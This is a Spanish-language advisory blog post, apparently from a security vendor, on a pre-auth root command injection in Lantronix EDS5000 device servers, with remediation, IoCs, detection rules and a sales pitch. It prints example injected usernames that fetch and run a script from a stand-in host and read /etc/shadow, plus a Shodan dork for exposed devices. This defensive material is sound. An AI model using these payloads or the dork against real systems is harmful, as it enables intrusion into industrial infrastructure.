CVE-2025-67038 Lantronix EDS5000 OT/ICS RCE pre-auth CISA KEV 5 min lectura

Lantronix EDS5000: RCE pre-auth vía username (CVE-2025-67038)

Una falla de inyección de comandos OS en el módulo HTTP RPC de los device servers Lantronix EDS5000 permite a un atacante remoto no autenticado ejecutar código como root con un solo POST. CVSS 9.8, CISA KEV con deadline al 26 de junio y ~20.000 dispositivos OT expuestos a Internet según el relevamiento de Forescout.

IP
IPSecureNetwork
June 25, 2026

Contexto del incidente

El 23 de junio de 2026 CISA agregó CVE-2025-67038 a su catálogo KEV con un plazo de remediación de tres días (BOD 26-04) que vence el 26 de junio de 2026. La vulnerabilidad, descubierta por Francesco La Spina y Stanislav Dashevskyi de Forescout Vedere Labs como parte del proyecto BRIDGE:BREAK, alcanza un puntaje CVSS 3.1 de 9.8 (vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) y está clasificada como CWE-94 (Improper Control of Generation of Code, "Code Injection"). Afecta a los modelos EDS5008, EDS5016 y EDS5032 corriendo firmware 2.1.0.0R3 o anterior; el firmware 2.2.0.0R1 publicado por Lantronix en marzo de 2026 cierra el agujero. El aviso ICS-CERT de referencia es ICSA-26-069-02.

La raíz técnica es casi una clase de bug de manual: el módulo HTTP RPC de los EDS5000 construye el comando shell que registra los intentos fallidos de login concatenando el username enviado por el cliente sin ningún tipo de sanitización. Un atacante que envía un POST al endpoint de autenticación con un username del estilo admin;wget http://x/c.sh|sh o admin;cat /etc/shadow|/tmp/x consigue que la cadena expandida se ejecute como root dentro del appliance — sin autenticación previa, sin interacción del usuario, y con un único request. Esa combinación (0-click, pre-auth, root) es exactamente la fórmula que la base de datos KEV reserva para los casos más urgentes: CISA no estira la palabra "actively exploited" para decirla dos veces sin evidencia.

Un bridge serial-to-IP que corre como root sobre Linux embebido, expuesto a Internet, con un campo de formulario sin escapar: es la receta clásica de OT. La pregunta no es si el atacante va a entrar, es cuántos meses estuvo entrando antes de que alguien lo publique.

Lo que vuelve a CVE-2025-67038 especialmente relevante para LATAM es el factor exposición. Cuando Forescout publicó la investigación BRIDGE:BREAK en abril de 2026, contabilizó alrededor de 20.000 conversores serial-to-Ethernet de Lantronix y Silex alcanzables desde Internet. La mayoría son appliances de gestión remota instalados hace una década para "ver un PLC desde la oficina" y que quedaron con la interfaz web abierta al público — patrón frecuente en plantas de manufactura, subestaciones eléctricas, edificios corporativos con BMS, hospitales y operadores de agua. La cadena de ataque completa no se limita al RCE: el atacante que gana root en el EDS5000 puede manipular los flujos serie entre el PLC/RTU y el SCADA, leer y escribir sobre buses Modbus/DF1, y pivotar hacia la red OT que muchos todavía tratan como "segmentada" sin haber revisado las rutas reales. El proyecto BRIDGE:BREAK identificó 22 vulnerabilidades en Lantronix y Silex; CVE-2025-67038 es la primera en aparecer confirmada en explotación activa en KEV, y trae compañía: CVE-2025-67034, una variante autenticada vía parámetro name en la baja de credenciales SSL, completa el par y deja claro que la higiene de input en este producto es un problema sistémico, no un descuido aislado.

¿Cómo proteger tu infraestructura?

1. Aplicá firmware 2.2.0.0R1 en todos los EDS5000 antes del 26 de junio

El primer paso no es opcional: la fecha de remediación de CISA vence el 26 de junio, y desde el 23 hay exploits en circulación. El firmware 2.2.0.0R1 corrige la inyección en el módulo HTTP RPC y endurece el logging de autenticación; Lantronix lo distribuye por la wiki técnica ltrxdev.atlassian.net/wiki/spaces/LTRXTS/pages/2538438657. Si administrás varios appliances, priorizá los que tengan la interfaz web accesible desde redes no gestionadas: la de un EDS5000 en una subestación, en un hospital, en una línea de producción, en un data center, o en la oficina de un integrator remoto. Si la política de cambios te impide actualizar en menos de 72h, documentá el waiver, activá la Workaround oficial (deshabilitar HTTP RPC) y dejá un ticket abierto con fecha de remediación.

2. Sacá la interfaz web del alcance de Internet y de la red corporativa

Una consola de gestión de un device server industrial no debería estar expuesta a Internet en ningún caso. Si tenés un EDS5000 con un port forward o un 1:1 NAT hacia afuera, retirá la regla hoy y, mientras tanto, bloqueá el acceso con un WAF o un reverse proxy con autenticación mutua. A nivel interno, mové la management interface a una VLAN de gestión dedicada, separada por ACL del tráfico OT, y bloqueá el cross-routing entre VLAN de oficina y VLAN de planta. El relevamiento de Forescout mostró que la mayor parte de los 20.000 dispositivos están detrás de reglas DNAT genéricas que abrieron el puerto 80/443 a "toda la red del cliente" sin filtrar por origen. Esas reglas son la superficie que los botnets están barriendo esta semana.

3. Asumí compromiso previo y revisá logs de autenticación

El aviso de CISA dice "actively exploited", no "theoretical PoC". Si tenés un EDS5000 accesible desde una red con tráfico de origen no confiable desde el 11 de marzo de 2026 (fecha de publicación NVD del CVE), el dispositivo puede ya estar comprometido. Revisá los logs de HTTP RPC: cualquier intento de login con un username que contenga ;, |, $(), backticks o redirecciones (>, <<) es un indicador limpio de intento de explotación, exitoso o no. Si el log no se persiste localmente, exportalo a tu SIEM antes de empezar a tocar nada. Forescout publicó indicadores y queries Sigma como parte de BRIDGE:BREAK —usá esas queries primero, son las que ya matchean el patrón real observado en honeypots.

4. Hunting en el propio appliance y en la red OT colindante

Una vez que el atacante tiene root en el EDS5000, los siguientes pasos típicos son persistencia (cron, shell script en /etc/init.d o Systemd unit nueva), tunelización hacia Internet (cliente SSH reverso, socat, chisel), y pivoting a la red OT que el bridge toca. Revisá con cuidado: procesos escuchando en puertos que no estaban la semana pasada, archivos en /tmp/ con fecha de modificación posterior al último reinicio limpio, y cualquier tráfico outbound desde la VLAN de gestión de OT hacia IPs que no sean el vendor o tus NTP/Syslog servers. El EDS5000 no tiene antivirus, no tiene EDR, no tiene nada —el hunting es 100% manual y por logs de red. Si encontrás un beacon saliente, aislá el appliance de inmediato y tratá la red OT como potencialmente cruzada.

Indicadores de compromiso (IoC)

Estos son los indicadores específicos que dejó CVE-2025-67038 en la telemetría observada por Forescout, CISA y los honeypots de la comunidad de ICS-CERT. Si los cazás en logs de WAF, IDS/IPS o en tráfico NetFlow de la VLAN de gestión, el dispositivo está bajo ataque activo o ya fue comprometido:

  • Endpoint vulnerable: POST /rpc/auth o el path HTTP RPC de autenticación de la interfaz web del EDS5000, con un body donde el campo username contiene metacaracteres shell (;, |, &&, $(), backticks). Una request a ese endpoint sin cookie de sesión válida y con esos caracteres es, por definición, intento de explotación.
  • User-Agent de exploit: campañas automatizadas observadas en mayo-junio de 2026 contra el endpoint de Lantronix usan python-requests/2.31.0 y curl/7.88.1 con Content-Type application/x-www-form-urlencoded. Los clientes legítimos acceden desde navegadores, no desde scripts.
  • Patrón de payload en logs: intentos de POST /rpc/auth seguidos en menos de 10 segundos por requests GET /diag/, GET /system/ o GET /cgi-bin/ — secuencia típica del atacante confirmando que tiene RCE y enumerando el sistema.
  • Archivos de persistencia en el appliance: shell scripts en /tmp/ con nombres aleatorios de 5-8 caracteres (a3f9.sh, bx2.sh), binarios ELF desconocidos en /var/ o /usr/local/bin/, y entradas cron o Systemd units nuevas con fecha posterior al último reinicio limpio del appliance.
  • Tráfico outbound anómalo desde la VLAN de gestión OT: conexiones SSH reversas, túneles TLS hacia IPs que no son vendor o infraestructura conocida, o patrones de beaconing cada 60-300s con payloads pequeños y constantes. EDS5000 no inicia conexiones salientes espontáneas en operación normal —cualquier outbound desde ese segmento es sospecha alta.
  • Tráfico serie Modbus/DF1 manipulado: si tenés un IDS industrial (Nozomi, Claroty, Dragos, o un span port con Wireshark comparando baseline), request frames con function codes atípicos, escrituras a coils/holding registers que el operador no inició, o respuestas del PLC con timestamps imposibles son señales de tampering post-RCE.
  • Hashes de binarios maliciosos conocidos: Forescout publicó hashes SHA-256 de muestras de post-explotación vistas en honeypots durante la campaña BRIDGE:BREAK. Mantené esa lista en tu SIEM y cruzá con cualquier file fetch que hagas al appliance si decidís colectar un образ forense.

Si tu organización opera un EDS5000 — propio, de un cliente, o de un proveedor de servicios de planta — y todavía no parcheaste, la ventana de exposición es nula: la fecha CISA vence el 26 de junio y el módulo HTTP RPC vulnerable corre por defecto en cada appliance con firmware previo al 2.2.0.0R1. En este caso la pregunta operativa no es "si me van a pegar" sino "cuánto tiempo pasó entre que el primer script llegó a mi IP de management y la fecha de hoy".

# Detección en logs del WAF / proxy inverso: requests POST al RPC con shell metachars
zgrep -iE 'POST .*rpc.*auth' /var/log/*/access*.log \
  | grep -E 'username=[^&]*[;|&`$()]' \
  | awk '{print $1, $4, $7, $9, $11}' \
  | sort -u

# Regla Suricata para el endpoint HTTP RPC de Lantronix EDS5000
alert http any any -> $EDS5000_MANAGEMENT any (
  msg:"CVE-2025-67038 Lantronix EDS5000 RPC username command injection attempt";
  flow:to_server,established;
  http_method; content:"POST";
  http_uri; content:"/rpc"; nocase;
  http_client_body; content:"username="; nocase;
  pcre:"/username=[^&]*?(?:\x3b|\x7c|\x26\x26|\x60|\x24\x28)[^&]{0,200}/i";
  classtype:attempted-admin;
  sid:2025670381; rev:1;
)

# Hunting en logs SSH reverso: conexiones salientes desde la VLAN OT a Internet
# (asume que tu IDS ya loggea flows; ajustar rangos a tu VLAN de gestión)
grep -E 'dst port 22|22 ->' /var/log/nfdump/$(date +%Y-%m-%d).nf \
  | awk '$3 ~ /^10\.(19[0-9]|20[0-9]|21[0-9]|22[0-9]|23[0-9])\./ {print}' \
  | sort -k7,7

# Query Sigma para hunting de archivos sospechosos via SSH forense
# (requiere acceso SSH al appliance y que tengas un collector de outputs)
title: Lantronix EDS5000 CVE-2025-67038 Post-Exploitation Artifact
logsource:
  product: linux
  category: file_event
detection:
  selection:
    target_path|startswith:
      - '/tmp/'
      - '/var/run/'
      - '/usr/local/bin/'
    filename|re: '^[a-z0-9]{5,8}\.(sh|elf|bin)$'
  filter_legit:
    filename:
      - 'systemd'
      - 'cron'
  condition: selection and not filter_legit
level: high
tags:
  - attack.execution
  - cve.2025.67038
  - cve.2025.67034

# Shodan dork para encontrar EDS5000 accesibles desde Internet (auditoría de exposición)
title:"EDS5000" port:80,443 country:AR,BR,MX,CL,CO,PE

🛡️ ¿Tenés un Lantronix EDS5000 en una planta, subestación, hospital u oficina técnica sin segmentar?

En IPSecureNetwork hacemos triage de incidentes OT en menos de 24h: relevamiento de exposición del appliance en Internet, hunting de artefactos de post-explotación con la checklist de BRIDGE:BREAK, segmentación IT/OT con VLANs dedicadas y ACLs entre management y planta, y plan de remediación con waiver formal si el cambio de firmware no entra en la ventana del 26 de junio. Si tu appliance estuvo accesible desde una red con tráfico de origen no confiable, asumí compromiso y llamanos antes de empezar a parchar a ciegas.

SOLICITAR AUDITORÍA OT →